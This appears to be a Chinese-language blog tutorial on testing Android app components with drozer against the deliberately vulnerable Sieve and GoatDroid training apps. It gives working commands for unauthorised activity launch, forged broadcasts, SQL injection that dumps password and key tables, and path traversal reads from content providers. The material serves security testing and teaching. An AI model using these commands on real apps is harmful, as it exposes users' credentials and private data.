Tag:android

Tag (android)'s result:

利用drozer测试安卓四大组件

0x00 安装drozer windows: 在github下载msi安装文件执行,装在local disk python27下。 pip install protobuf pyOpenSSL Twisted service_identity 下载drozer agent https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk adb.exe install drozer-agent.apk adb.exe install test.apk 开启drozer-agent enable adb forward tcp:31415 tcp:31415 cd C:\python27\scripts: drozer console connect      0x01 Activity PWList的activity设置为了true,有被导出风险。 未授权访问 dz> run app.activity.start –component com.mwr.example.sieve com.mwr.example.sieve.PWList   0x02 Broadcast receiver的exported未设置,可被利用。   发送恶意广播 run app.broadcast.send –action org.owasp.goatdroid.fourgoats.SOCIAL_SMS –extra string phoneNumber 1234 –extra string message pwnd dos造成崩溃 run app.broadcast.send –action org.owasp.goatdroid.fourgoats.SOCIAL_SMS     0x03 Service 没设置exported为false,默认可以导出。 启动GPS位置服务。 run app.service.start –action org.owasp.goatdroid.fourgoats.services.LocationService –component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService     0x04 Content 列出可访问内容URI的列表和路径: SQL注入:   0x05 相关命令 run scanner.provider.finduris -a com.mwr.example.sieve run app.service.info -a org.owasp.goatdroid.fourgoats run app.service.start –action org.owasp.goatdroid.fourgoats.services.LocationService –component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.services.LocationService run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ –projection “* FROM SQLITE_MASTER WHERE type=’table’;–” run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ –projection “* FROM Key;–” run scanner.provider.injection -a com.mwr.example.sieve run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data run app.provider.info -a com.mwr.example.sieve run app.service.send com.mwr.example.sievecom.mwr.example.sieve.AuthService –msg 2354 9234 0 –extra stringcom.mwr.example.sieve.PIN 1234 –bundle-as-obj run app.provider.querycontent://com.mwr.example.sieve.DBContentProvider/Keys/  –projection “* from Passwords;–” run scanner.provider.traversal -a com.mwr.example.sieve   0x06 参考资料 https://www.freebuf.com/column/175218.html https://www.freebuf.com/articles/web/165466.html https://www.jianshu.com/p/dfa92bab3a55